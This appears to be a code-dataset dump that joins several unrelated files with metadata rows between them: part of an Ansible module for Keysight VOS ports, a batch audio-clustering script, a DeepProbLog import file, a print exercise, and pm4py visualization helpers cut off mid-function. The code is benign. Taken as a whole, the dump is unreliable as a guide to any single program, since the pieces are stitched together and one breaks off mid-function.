required: true
type: integer
raw_custom:
description:
- List of items described below.
type: list
tcp_control:
description:
- List of items described below.
type: list
suboptions:
value:
required: true
type: string
vlan:
description:
- List of items described below.
type: list
suboptions:
priority:
type: string
vlan_id:
type: integer
vntag:
description:
- List of items described below.
type: list
suboptions:
value:
required: true
type: integer
vxlan_vni:
description:
- List of items described below.
type: list
suboptions:
field_name:
type: string
field_set:
type: string
choices: ['FS2', 'FS1', 'BOTH']
value:
required: true
type: integer
filter_match_count_unit:
description:
- Available on all platforms.
type: string
choices: ['BYTES', 'PACKETS']
filter_mode:
description:
- Available on all platforms.
type: string
choices: ['PASS_ALL', 'DISABLE', 'PBC_UNMATCHED', 'PASS_BY_CRITERIA', 'DENY_BY_CRITERIA', 'DBC_MATCHED', 'EXCLUDE_BY_CRITERIA']
filtering_direction:
description:
- Available on all platforms.
type: string
choices: ['EGRESS', 'INGRESS']
filtering_options:
description:
- Available on 7300 Series, TradeVision Series, E100 Series, E40 Series, Vision Edge OS, Vision X Series, Vision E10S.
type: dict
suboptions:
optimize_connected_df_rules:
description:
- The optimize_connected_df_rules property defaults to true.
required: true
type: bool
force_link_up:
description:
- Available on all platforms.
type: string
choices: ['DISABLED', 'NOT_SUPPORTED', 'MIXED', 'ENABLED']
forward_error_correction_settings:
description:
- Available on all platforms.
type: dict
suboptions:
enabled:
required: true
type: bool
fec_type:
required: true
type: string
choices: ['FC_FEC', 'RS_FEC']
geneve_strip_settings:
description:
- Available on Vision X Series.
type: dict
suboptions:
enabled:
type: bool
port_mode:
type: string
choices: ['LOOPBACK', 'NETWORK', 'BYPASS_BIDIRECTIONAL', 'HA_FABRIC', 'BIDIRECTIONAL', 'TOOL', 'SIMPLEX', 'INLINE_TOOL_BIDIRECTIONAL']
icon_type:
description:
- Available on all platforms.
type: string
choices: ['TAP', 'INLINE_BYPASS_PORT_SFP', 'LFD', 'INTERCONNECT', 'QSFP_PLUS', 'LOOPBACK_PORT_SFP', 'INLINE_BYPASS_PORT_CFP', 'BIDIRECTIONAL_PORT_QSFP28', 'INLINE_TOOL_PORT_GROUP', 'RJ45', 'OPENFLOW_PORT_CHANNEL', 'DESKTOP_CRT', 'XFP', 'NETSERVICE_INLINE_BYPASS_PORT_GROUP', 'LOAD_BALANCE', 'BIDIRECTIONAL_PORT_CFP', 'DUAL_QSFP_PLUS', 'ROUTER', 'INLINE_BYPASS_PORT_QSFP_PLUS', 'BIDIRECTIONAL_PORT_SFP', 'INLINE_TOOL_PORT_SFP', 'TOWER', 'WRENCH', 'LAPTOP', 'NETFLOW_INTERCONNECT', 'SIMPLEX_PORT_QSFP_PLUS', 'GTP_LOAD_BALANCE', 'MULTI_SERVICES_SWITCH', 'LAYER_3_SWITCH', 'PHONE', 'LOOPBACK_PORT_QSFP_PLUS', 'NETSERVICE_INLINE_TOOL_PORT_GROUP', 'HA_FABRIC_SFP', 'DESKTOP_LCD', 'SIMPLEX_PORT_SFP_PLUS', 'CFP', 'LOOPBACK_PORT_GROUP', 'LOOPBACK_PORT_QSFP28', 'INLINE_BYPASS_PORT_GROUP', 'SERVER', 'CUSTOM', 'QSFP28', 'AGGREGATION_PORT', 'SFP', 'INLINE_TOOL_PORT_CFP', 'MAGNIFYING_GLASS', 'WORKGROUP_SWITCH', 'CX4', 'BIDIRECTIONAL_PORT_QSFP_PLUS', 'SFP_PLUS', 'INLINE_TOOL_PORT_QSFP_PLUS', 'BIDI_INTERCONNECT', 'RACK', 'NETSERVICE_PASSIVE_DECRYPTED', 'HA_FABRIC_QSFP_PLUS']
ignore_pause_frames:
description:
- Enables or disables the flag that indicates whether the port is to ignore pause frames.
- Available on all platforms.
type: bool
inline_bypass_connector_id:
description:
- Available on TradeVision Series, E100 Series, E40 Series, Vision X Series, Vision E10S.
type: integer
inline_tool_connector_id:
description:
- Available on TradeVision Series, E100 Series, E40 Series, Vision X Series, Vision E10S.
type: integer
keywords:
description:
- The list of keywords used by the filter.
- List of items described below.
- A lowercase version of the value, like port for PORT or Port.
- Available on all platforms.
type: list
link_settings:
description:
- Sets the requested port link settings.
- Available on all platforms.
type: string
choices: ['10M_HALF', '25G_FULL', '10M_FULL', 'G20_FULL', '100M_HALF', 'G42_FULL', '1G_FULL', '10G_FULL', '100M_FULL', '40G_FULL', '50G_FULL', 'AUTO', '100G_FULL']
link_up_down_trap_enabled:
description:
- Enables the link up/down traps for specific interfaces.
- Available on all platforms.
type: bool
lldp_receive_enabled:
description:
- Available on 7300 Series, TradeVision Series, E100 Series, E40 Series, Vision Edge OS, Vision X Series, Vision E10S.
type: bool
lldp_transmit_enabled:
description:
- Available on 7300 Series, TradeVision Series, E100 Series, E40 Series, Vision Edge OS, Vision X Series, Vision E10S.
type: bool
media_type:
description:
- Available on all platforms.
type: string
choices: ['XFP_10G', 'RXAUI', 'DXAUI', 'QSFP_PLUS_40G', 'CPU_PCIE', 'CFP_100G', 'SFP28', 'COPPER_1G', 'QSFP28', 'SFP_1G', 'G42_HIGIG2', 'CX4_10G', 'SFP_PLUS_10G']
mod_count:
description:
- Available on all platforms.
type: integer
mode:
description:
- Available on all platforms.
type: string
choices: ['LOOPBACK', 'NETWORK', 'BYPASS_BIDIRECTIONAL', 'HA_FABRIC', 'BIDIRECTIONAL', 'TOOL', 'SIMPLEX', 'INLINE_TOOL_BIDIRECTIONAL']
modify_access_settings:
description:
- Available on all platforms.
type: dict
suboptions:
groups:
description:
- List of items described below.
- The NAME property of a group
required: true
type: list
policy:
required: true
type: string
choices: ['ALLOW_ALL', 'REQUIRE_MEMBER', 'REQUIRE_ADMIN']
name:
description:
- Sets the optional, user-assigned port name.
- Available on all platforms.
type: string
netstack_tunnel_origination_local_settings:
description:
- Available on E100 Series, E40 Series, Vision Edge OS, Vision X Series.
type: dict
suboptions:
enabled:
required: true
type: bool
l2gre_key:
type: long
vnid:
type: long
netstack_tunnel_origination_remote_settings:
description:
- Available on E100 Series, E40 Series, Vision Edge OS, Vision X Series.
type: dict
suboptions:
remote_ip_address:
required: true
type: string
remote_mac_address:
type: dict
suboptions:
mac_address:
required: true
type: string
netstack_tunnel_termination_settings:
description:
- Available on E100 Series, E40 Series, Vision Edge OS, Vision X Series.
type: dict
suboptions:
enabled:
required: true
type: bool
ip_version:
type: string or integer
l2gre_key:
type: long
vnid:
type: long
network_interface_settings:
description:
- Available on all platforms.
type: dict
suboptions:
arp_reply_enabled:
type: bool
default_gateway:
type: string
icmp_reply_enabled:
type: bool
ip_address:
type: string
ip_settings_enabled:
required: true
type: bool
ip_version:
type: string or integer
subnet_mask:
type: string
vlan_enabled:
required: true
type: bool
nextgen_gsc_tpg_config:
description:
- Available on all platforms.
type: dict
suboptions:
enable_session_thresholds:
required: true
type: bool
non_session_tpg:
required: true
type: bool
session_thresholds:
required: true
type: integer
utilization_thresholds:
required: true
type: integer
packet_length_trailer_settings:
description:
- Available on all platforms.
type: dict
suboptions:
adjust_length:
description:
- The adjust_length property defaults to false. It must be set to true if the length.
type: bool
enabled:
description:
- The enabled property defaults to false.
required: true
type: bool
port_mode:
description:
- The port_mode may be set to either NETWORK or TOOL. It defaults to null and will be set based on a network or tool ports mode. For bidirectional ports, it must be set to either NETWORK or TOOL.
type: string
choices: ['LOOPBACK', 'NETWORK', 'BYPASS_BIDIRECTIONAL', 'HA_FABRIC', 'BIDIRECTIONAL', 'TOOL', 'SIMPLEX', 'INLINE_TOOL_BIDIRECTIONAL']
pppoe_strip_settings:
description:
- Available on 7300 Series, Vision X Series.
type: dict
suboptions:
enabled:
description:
- The enabled property defaults to false.
required: true
type: bool
port_mode:
description:
- The port_mode property may be set to either NETWORK or TOOL. It defaults to null and will be set based on a network or tool ports mode. For bidirectional ports, it must be set to either NETWORK or TOOL.
type: string
choices: ['LOOPBACK', 'NETWORK', 'BYPASS_BIDIRECTIONAL', 'HA_FABRIC', 'BIDIRECTIONAL', 'TOOL', 'SIMPLEX', 'INLINE_TOOL_BIDIRECTIONAL']
resource_access_settings:
description:
- Available on 7300 Series, TradeVision Series, Vision X Series, Vision E10S, F400 Series.
type: dict
suboptions:
groups:
description:
- List of items described below.
- The NAME property of a group
required: true
type: list
policy:
required: true
type: string
choices: ['ALLOW_ALL', 'REQUIRE_MEMBER', 'REQUIRE_ADMIN']
snmp_tag:
description:
- Sets the tag used by the SNMP component for a port.
- Available on all platforms.
type: string
std_port_tagging_settings:
description:
- Available on all platforms.
type: dict
suboptions:
enabled:
description:
- The enabled property defaults to false. When disabling this setting, vlan_id is an optional field, but vlan_id is required when setting it to enable.
required: true
type: bool
vlan_id:
description:
- For information on the default values used for vlan_id see the User Guide.
type: integer
std_strip_by_vlan_settings:
description:
- Available on 7300 Series, TradeVision Series, E100 Series, E40 Series, Vision Edge OS, Vision X Series, Vision E10S.
type: dict
suboptions:
enabled:
description:
- The enabled property defaults to false.
required: true
type: bool
strip_mode:
description:
- This is an egress-only feature, so the port's mode must support egress traffic. This setting will be applied to the egress side regardless of the value in the strip_mode property, so this property may safely be ignored.
type: string
choices: ['EGRESS', 'INGRESS', 'INGRESS_AGGREGATION_SWITCH_FABRIC', 'BOTH']
vlan_id:
description:
- The vlan_id property is optional (ignored) when disabling this setting but required when enabling.
type: integer
std_vlan_strip_settings:
description:
- Available on all platforms.
type: dict
suboptions:
egress_count:
description:
- Egress count is the maximum number of VLAN tags to strip in the egress direction.
type: integer
enabled:
description:
- Will be true if the VLAN stripping feature is enabled, false otherwise.
required: true
type: bool
ingress_count:
description:
- Ingress count is the maximum number of VLAN tags to strip in the ingress direction.
type: integer
strip_mode:
description:
- Stripping mode. This is either INGRESS, EGRESS, or BOTH.
type: string
choices: ['EGRESS', 'INGRESS', 'INGRESS_AGGREGATION_SWITCH_FABRIC', 'BOTH']
timestamp_translation_settings:
description:
- Available on Vision X Series.
type: dict
suboptions:
enabled:
description:
- The enabled property defaults to false.
required: true
type: bool
port_mode:
description:
- The port_mode defaults to null but will be set based on the port's mode.
type: string
choices: ['LOOPBACK', 'NETWORK', 'BYPASS_BIDIRECTIONAL', 'HA_FABRIC', 'BIDIRECTIONAL', 'TOOL', 'SIMPLEX', 'INLINE_TOOL_BIDIRECTIONAL']
ts_arista_48_64b_l2_insertion_enabled:
description:
- Arista 48/64b L2 Insertion (7280R, 7500R).
required: true
type: bool
ts_arista_src_mac_enabled:
description:
- Arista MAC Substitution (7280R, 7500R).
required: true
type: bool
tx_light_status:
description:
- Available on all platforms.
type: string
choices: ['NOT_SUPPORTED', 'MIXED', 'OFF', 'ON']
view_access_settings:
description:
- Available on all platforms.
type: dict
suboptions:
groups:
description:
- List of items described below.
- The NAME property of a group
required: true
type: list
policy:
required: true
type: string
choices: ['ALLOW_ALL', 'REQUIRE_MEMBER', 'REQUIRE_ADMIN']
author:
- Keysight
'''
EXAMPLES = '''
- name: Change port mode to TOOL
vos_ports:
settings:
enabled: true
mode: TOOL
name: P04
- name: Change port mode to BIDIRECTIONAL
vos_ports:
settings:
enabled: true
mode: BIDIRECTIONAL
name: P03
- name: Configure filter mode to Pass By Criteria for a NETWORK port
vos_ports:
settings:
enabled: true
filter_criteria:
ip_protocol:
value: '1'
ipv4_src:
addr:
- 192.168.100.0/24
logical_operation: AND
mac_src:
addr:
- 00-01-02-*-*-*
filter_mode: PASS_BY_CRITERIA
mode: NETWORK
name: P04
- name: Configure filter mode to Pass By Criteria for a TOOL port
vos_ports:
settings:
enabled: true
filter_criteria:
inner_vlan:
priority: '000'
vlan_id: '4090'
ip_protocol:
value: '118'
logical_operation: AND
filter_mode: PASS_BY_CRITERIA
mode: TOOL
name: P03
- name: Enable Standard VLAN stripping for a TOOL port
vos_ports:
settings:
mode: TOOL
name: P04
std_vlan_strip_settings:
egress_count: 2
enabled: true
ingress_count: 0
strip_mode: EGRESS
- name: Enable Standard VLAN stripping for a BIDIRECTIONAL port
vos_ports:
settings:
mode: BIDIRECTIONAL
name: P03
std_vlan_strip_settings:
egress_count: 2
enabled: true
ingress_count: 0
strip_mode: EGRESS
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.connection import Connection
from ansible.module_utils.network.vos.resource_configurator import ResourceConfigurator
def _refresh_settings_spec(module, configurator):
    """Best-effort refresh of the 'settings' argument spec.

    Replaces the generic ``settings: dict`` spec with the full port schema
    fetched from the appliance over the Web API, then re-validates the
    supplied arguments. Any failure (unreachable appliance, incompatible
    Ansible internals, ...) is deliberately swallowed so the module keeps
    working with the static spec.
    """
    try:
        from inspect import signature
        # fetch using Web API the python dictionary representing the argument_spec
        properties = configurator.connection.get_python_representation_of_object('ports', 'ports')
        module.argument_spec['settings'] = {'type': 'dict', 'options': properties}
        # Ansible changed _check_arguments' signature across releases; call it
        # in whichever form this installed version supports.
        s = signature(module._check_arguments)
        if 'check_invalid_arguments' in s.parameters:
            module._check_arguments(check_invalid_arguments=False)
        else:
            module._check_arguments()
    except Exception:
        # Best-effort only -- never fail the module because the dynamic
        # argument-spec refresh did not work. (Narrowed from a bare except so
        # SystemExit/KeyboardInterrupt still propagate.)
        pass


def run_module():
    """Configure VOS ports.

    Resolves the target port (by 'port' id or by 'settings.name'), applies
    the requested settings through the ResourceConfigurator and reports the
    per-request outcome back to Ansible via exit_json/fail_json.
    """
    module = AnsibleModule(argument_spec={'port': dict(type='str'), 'delete': dict(type='bool'),
                                          'software_version': dict(type='str'), 'settings': dict(type='dict')})
    connection = Connection(module._socket_path)
    configurator = ResourceConfigurator(connection=connection, module=module)

    _refresh_settings_spec(module, configurator)

    result = dict(
        changed=False,
        messages=[]
    )
    try:
        configurator.clear_payload(module.params)
        configurator.module = module
        # AnsibleModule pre-populates every declared option (value None when
        # not supplied), so key presence is always true; test the value.
        if module.params.get('port') is not None:
            configurator.get_target('port', '/ports')
        elif module.params.get('settings') and 'name' in module.params['settings']:
            configurator.get_target('name', '/ports')
        output = configurator.configure_ports()
        for each in output:
            if each['status_code'] not in [200, 202, 401]:
                result['failed'] = True
            elif each['content'] != 'NOT CHANGED':
                result['changed'] = True
            result['messages'].append(each['content'])
        module.exit_json(**result)
    except Exception as e:
        # fail_json expects a string message; the raw exception object may not
        # be JSON-serializable.
        module.fail_json(msg=str(e), **result)
def main():
    """Module entry point invoked by Ansible."""
    run_module()
if __name__ == '__main__':
    main()
| 48.993252 | 1,082 | 0.397087 | 6,170 | 79,859 | 5.026094 | 0.100486 | 0.027474 | 0.050015 | 0.090935 | 0.764632 | 0.747251 | 0.724614 | 0.707201 | 0.690368 | 0.674148 | 0 | 0.036968 | 0.559311 | 79,859 | 1,629 | 1,083 | 49.023327 | 0.844202 | 0.015765 | 0 | 0.838422 | 0 | 0.026081 | 0.976715 | 0.039432 | 0 | 0 | 0 | 0 | 0 | 1 | 0.001272 | false | 0.008906 | 0.002545 | 0 | 0.003817 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
f9ce5a6b8fc4701f96eb813b59bd63588836ef4d | 467 | py | Python | marsyas-vamp/marsyas/scripts/Python/batchPan.py | jaouahbi/VampPlugins | 27c2248d1c717417fe4d448cdfb4cb882a8a336a | [
"Apache-2.0"
] | null | null | null | marsyas-vamp/marsyas/scripts/Python/batchPan.py | jaouahbi/VampPlugins | 27c2248d1c717417fe4d448cdfb4cb882a8a336a | [
"Apache-2.0"
] | null | null | null | marsyas-vamp/marsyas/scripts/Python/batchPan.py | jaouahbi/VampPlugins | 27c2248d1c717417fe4d448cdfb4cb882a8a336a | [
"Apache-2.0"
] | null | null | null | import os
from glob import glob
beginCommand = "peakClustering.exe -a -s 2 -c 3 -k 2 -i 0_300 -o c:\output\\bass -p 1_-1_0.05_-1 "
for name in glob("..\..\..\jazz\*.wav"):
command = beginCommand+name
print command
os.system(command)
beginCommand = "peakClustering.exe -a -s 2 -c 3 -k 2 -i 250_2500 -o c:\output\up -p 1_-1_0.2_-1 "
for name in glob("..\..\..\jazz\*.wav"):
command = beginCommand+name
print command
os.system(command)
| 25.944444 | 99 | 0.62955 | 80 | 467 | 3.575 | 0.4125 | 0.199301 | 0.202797 | 0.20979 | 0.755245 | 0.755245 | 0.755245 | 0.755245 | 0.755245 | 0.755245 | 0 | 0.075067 | 0.201285 | 467 | 17 | 100 | 27.470588 | 0.691689 | 0 | 0 | 0.666667 | 0 | 0.166667 | 0.442222 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.166667 | null | null | 0.166667 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
f9dc4a9df20cdee9619fe8c467154891757e8946 | 172 | py | Python | src/deepproblog/engines/__init__.py | vossenwout/gtadeepproblog | 65509b740518af422b96e84ef10716e0ac246e75 | [
"Apache-2.0"
] | 54 | 2021-06-23T08:03:23.000Z | 2022-03-10T01:02:43.000Z | src/deepproblog/engines/__init__.py | vossenwout/gtadeepproblog | 65509b740518af422b96e84ef10716e0ac246e75 | [
"Apache-2.0"
] | 2 | 2021-06-30T23:48:25.000Z | 2022-03-18T10:45:05.000Z | src/deepproblog/engines/__init__.py | vossenwout/gtadeepproblog | 65509b740518af422b96e84ef10716e0ac246e75 | [
"Apache-2.0"
] | 12 | 2021-06-30T10:47:52.000Z | 2022-03-09T23:51:48.000Z | from deepproblog.engines.approximate_engine import ApproximateEngine
from deepproblog.engines.engine import Engine
from deepproblog.engines.exact_engine import ExactEngine
| 43 | 68 | 0.895349 | 20 | 172 | 7.6 | 0.45 | 0.296053 | 0.434211 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.069767 | 172 | 3 | 69 | 57.333333 | 0.95 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
fb068af71b5e3f11b75c032d52ccd7c917957306 | 486 | py | Python | practice_py/Netacad_lab_printing_arrow.py | RootProgrammer/Python | d3308af735934d40df5ca2b115cf1deffcae5fac | [
"MIT"
] | 1 | 2021-04-18T08:14:41.000Z | 2021-04-18T08:14:41.000Z | practice_py/Netacad_lab_printing_arrow.py | RootProgrammer/Python | d3308af735934d40df5ca2b115cf1deffcae5fac | [
"MIT"
] | null | null | null | practice_py/Netacad_lab_printing_arrow.py | RootProgrammer/Python | d3308af735934d40df5ca2b115cf1deffcae5fac | [
"MIT"
] | null | null | null | print(" *\t\t"*2)
print(" * *\t\t"*2)
print(" * *\t\t"*2)
print(" * *\t"*2)
print("*** ***\t"*2)
print(" * *\t\t"*2)
print(" * *\t\t"*2)
print(" *****\t\t"*2)
print("""
*
* *
* *
* *
* *
* *
* *
* *
* *
****** ******
* *
* *
* *
* *
* *
*********
""")
| 17.357143 | 23 | 0.13786 | 31 | 486 | 2.16129 | 0.096774 | 0.716418 | 0.835821 | 0.835821 | 1 | 1 | 1 | 0.910448 | 0.910448 | 0.910448 | 0 | 0.040201 | 0.590535 | 486 | 27 | 24 | 18 | 0.296482 | 0 | 0 | 0.653846 | 0 | 0 | 0.75817 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 0.346154 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 13 |
fb263c4d6927206d1611fe0e870078aaf08b69e6 | 28,674 | py | Python | ws2122-lspm/Lib/site-packages/pm4py/vis.py | Malekhy/ws2122-lspm | e4dc8b801d12f862b8ef536a0f125f346f085a00 | [
"MIT"
] | 1 | 2022-01-19T04:02:46.000Z | 2022-01-19T04:02:46.000Z | ws2122-lspm/Lib/site-packages/pm4py/vis.py | Malekhy/ws2122-lspm | e4dc8b801d12f862b8ef536a0f125f346f085a00 | [
"MIT"
] | 1 | 2021-11-19T07:21:48.000Z | 2021-11-19T07:21:48.000Z | ws2122-lspm/Lib/site-packages/pm4py/vis.py | Malekhy/ws2122-lspm | e4dc8b801d12f862b8ef536a0f125f346f085a00 | [
"MIT"
] | 1 | 2022-01-14T17:15:38.000Z | 2022-01-14T17:15:38.000Z | '''
This file is part of PM4Py (More Info: https://pm4py.fit.fraunhofer.de).
PM4Py is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
PM4Py is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with PM4Py. If not, see <https://www.gnu.org/licenses/>.
'''
import os
from copy import copy
from typing import Optional
from typing import Union, List, Dict, Any
import pandas as pd
from pm4py.objects.bpmn.obj import BPMN
from pm4py.objects.heuristics_net.obj import HeuristicsNet
from pm4py.objects.log.obj import EventLog
from pm4py.objects.petri_net.obj import PetriNet, Marking
from pm4py.objects.process_tree.obj import ProcessTree
from pm4py.util.pandas_utils import check_is_pandas_dataframe, check_pandas_dataframe_columns
from pm4py.utils import get_properties, general_checks_classical_event_log
def view_petri_net(petri_net: PetriNet, initial_marking: Optional[Marking] = None,
                   final_marking: Optional[Marking] = None, format: str = "png"):
    """
    Views a (composite) Petri net on screen.

    Parameters
    -------------
    petri_net
        Petri net
    initial_marking
        Initial marking (optional)
    final_marking
        Final marking (optional)
    format
        Format of the output picture (default: png)
    """
    from pm4py.visualization.petri_net import visualizer as pn_visualizer
    # Resolve the format parameter key of the undecorated variant once.
    format_key = pn_visualizer.Variants.WO_DECORATION.value.Parameters.FORMAT
    gviz = pn_visualizer.apply(petri_net, initial_marking, final_marking,
                               parameters={format_key: format})
    pn_visualizer.view(gviz)
def save_vis_petri_net(petri_net: PetriNet, initial_marking: Marking, final_marking: Marking, file_path: str):
    """
    Saves a Petri net visualization to a file; the image format is
    inferred from the file extension of the destination path.

    Parameters
    --------------
    petri_net
        Petri net
    initial_marking
        Initial marking
    final_marking
        Final marking
    file_path
        Destination path
    """
    # Image format comes from the destination's extension (without the dot).
    image_format = os.path.splitext(file_path)[1][1:]
    from pm4py.visualization.petri_net import visualizer as pn_visualizer
    format_key = pn_visualizer.Variants.WO_DECORATION.value.Parameters.FORMAT
    gviz = pn_visualizer.apply(petri_net, initial_marking, final_marking,
                               parameters={format_key: image_format})
    pn_visualizer.save(gviz, file_path)
def view_performance_dfg(dfg: dict, start_activities: dict, end_activities: dict, format: str = "png",
                         aggregation_measure="mean"):
    """
    Views a performance DFG on screen.

    Parameters
    ----------------
    dfg
        DFG object
    start_activities
        Start activities
    end_activities
        End activities
    format
        Format of the output picture (default: png)
    aggregation_measure
        Aggregation measure (default: mean): mean, median, min, max, sum, stdev
    """
    from pm4py.visualization.dfg import visualizer as dfg_visualizer
    from pm4py.visualization.dfg.variants import performance as dfg_perf_visualizer
    perf_params = dfg_perf_visualizer.Parameters
    parameters = {
        perf_params.FORMAT: format,
        perf_params.START_ACTIVITIES: start_activities,
        perf_params.END_ACTIVITIES: end_activities,
        perf_params.AGGREGATION_MEASURE: aggregation_measure,
    }
    gviz = dfg_perf_visualizer.apply(dfg, parameters=parameters)
    dfg_visualizer.view(gviz)
def save_vis_performance_dfg(dfg: dict, start_activities: dict, end_activities: dict, file_path: str,
                             aggregation_measure="mean"):
    """
    Saves the visualization of a performance DFG to a file; the image
    format is inferred from the file extension.

    Parameters
    ----------------
    dfg
        DFG object
    start_activities
        Start activities
    end_activities
        End activities
    file_path
        Destination path
    aggregation_measure
        Aggregation measure (default: mean): mean, median, min, max, sum, stdev
    """
    image_format = os.path.splitext(file_path)[1][1:]
    from pm4py.visualization.dfg import visualizer as dfg_visualizer
    from pm4py.visualization.dfg.variants import performance as dfg_perf_visualizer
    perf_params = dfg_perf_visualizer.Parameters
    parameters = {
        perf_params.FORMAT: image_format,
        perf_params.START_ACTIVITIES: start_activities,
        perf_params.END_ACTIVITIES: end_activities,
        perf_params.AGGREGATION_MEASURE: aggregation_measure,
    }
    gviz = dfg_perf_visualizer.apply(dfg, parameters=parameters)
    dfg_visualizer.save(gviz, file_path)
def view_dfg(dfg: dict, start_activities: dict, end_activities: dict, format: str = "png",
             log: Optional[EventLog] = None):
    """
    Views a (composite) DFG

    Parameters
    -------------
    dfg
        DFG object
    start_activities
        Start activities
    end_activities
        End activities
    format
        Format of the output picture (default: png)
    log
        (Optional) event log used to enrich the visualization properties
    """
    # Fix: validate the optional log like the sibling save_vis_dfg does;
    # previously a malformed log was silently passed through to the visualizer.
    if log is not None:
        general_checks_classical_event_log(log)
    from pm4py.visualization.dfg import visualizer as dfg_visualizer
    dfg_parameters = dfg_visualizer.Variants.FREQUENCY.value.Parameters
    parameters = get_properties(log)
    parameters[dfg_parameters.FORMAT] = format
    parameters[dfg_parameters.START_ACTIVITIES] = start_activities
    parameters[dfg_parameters.END_ACTIVITIES] = end_activities
    gviz = dfg_visualizer.apply(dfg, log=log, variant=dfg_visualizer.Variants.FREQUENCY,
                                parameters=parameters)
    dfg_visualizer.view(gviz)
def save_vis_dfg(dfg: dict, start_activities: dict, end_activities: dict, file_path: str,
                 log: Optional[EventLog] = None):
    """
    Saves a DFG visualization to a file; the image format is inferred
    from the file extension.

    Parameters
    --------------
    dfg
        DFG object
    start_activities
        Start activities
    end_activities
        End activities
    file_path
        Destination path
    log
        (Optional) event log used to enrich the visualization properties
    """
    if log is not None:
        general_checks_classical_event_log(log)
    image_format = os.path.splitext(file_path)[1][1:]
    from pm4py.visualization.dfg import visualizer as dfg_visualizer
    freq_variant = dfg_visualizer.Variants.FREQUENCY
    dfg_parameters = freq_variant.value.Parameters
    parameters = get_properties(log)
    parameters[dfg_parameters.FORMAT] = image_format
    parameters[dfg_parameters.START_ACTIVITIES] = start_activities
    parameters[dfg_parameters.END_ACTIVITIES] = end_activities
    gviz = dfg_visualizer.apply(dfg, log=log, variant=freq_variant, parameters=parameters)
    dfg_visualizer.save(gviz, file_path)
def view_process_tree(tree: ProcessTree, format: str = "png"):
    """
    Views a process tree on screen.

    Parameters
    ---------------
    tree
        Process tree
    format
        Format of the visualization (default: png)
    """
    from pm4py.visualization.process_tree import visualizer as pt_visualizer
    pt_params = pt_visualizer.Variants.WO_DECORATION.value.Parameters
    gviz = pt_visualizer.apply(tree, parameters={pt_params.FORMAT: format})
    pt_visualizer.view(gviz)
def save_vis_process_tree(tree: ProcessTree, file_path: str):
    """
    Saves the visualization of a process tree; the image format is
    inferred from the file extension.

    Parameters
    ---------------
    tree
        Process tree
    file_path
        Destination path
    """
    image_format = os.path.splitext(file_path)[1][1:]
    from pm4py.visualization.process_tree import visualizer as pt_visualizer
    pt_params = pt_visualizer.Variants.WO_DECORATION.value.Parameters
    gviz = pt_visualizer.apply(tree, parameters={pt_params.FORMAT: image_format})
    pt_visualizer.save(gviz, file_path)
def save_vis_bpmn(bpmn_graph: BPMN, file_path: str):
    """
    Saves the visualization of a BPMN graph; the image format is inferred
    from the file extension.

    Parameters
    --------------
    bpmn_graph
        BPMN graph
    file_path
        Destination path
    """
    image_format = os.path.splitext(file_path)[1][1:]
    from pm4py.visualization.bpmn import visualizer as bpmn_visualizer
    bpmn_params = bpmn_visualizer.Variants.CLASSIC.value.Parameters
    gviz = bpmn_visualizer.apply(bpmn_graph, parameters={bpmn_params.FORMAT: image_format})
    bpmn_visualizer.save(gviz, file_path)
def view_bpmn(bpmn_graph: BPMN, format: str = "png"):
    """
    Views a BPMN graph on screen.

    Parameters
    ---------------
    bpmn_graph
        BPMN graph
    format
        Format of the visualization (default: png)
    """
    from pm4py.visualization.bpmn import visualizer as bpmn_visualizer
    bpmn_params = bpmn_visualizer.Variants.CLASSIC.value.Parameters
    gviz = bpmn_visualizer.apply(bpmn_graph, parameters={bpmn_params.FORMAT: format})
    bpmn_visualizer.view(gviz)
def view_heuristics_net(heu_net: HeuristicsNet, format: str = "png"):
    """
    Views an heuristics net on screen.

    Parameters
    --------------
    heu_net
        Heuristics net
    format
        Format of the visualization (default: png)
    """
    from pm4py.visualization.heuristics_net import visualizer as hn_visualizer
    hn_params = hn_visualizer.Variants.PYDOTPLUS.value.Parameters
    gviz = hn_visualizer.apply(heu_net, parameters={hn_params.FORMAT: format})
    hn_visualizer.view(gviz)
def save_vis_heuristics_net(heu_net: HeuristicsNet, file_path: str):
    """
    Saves the visualization of an heuristics net; the image format is
    inferred from the file extension.

    Parameters
    --------------
    heu_net
        Heuristics net
    file_path
        Destination path
    """
    image_format = os.path.splitext(file_path)[1][1:]
    from pm4py.visualization.heuristics_net import visualizer as hn_visualizer
    hn_params = hn_visualizer.Variants.PYDOTPLUS.value.Parameters
    gviz = hn_visualizer.apply(heu_net, parameters={hn_params.FORMAT: image_format})
    hn_visualizer.save(gviz, file_path)
def __dotted_attribute_selection(log, attributes):
    """
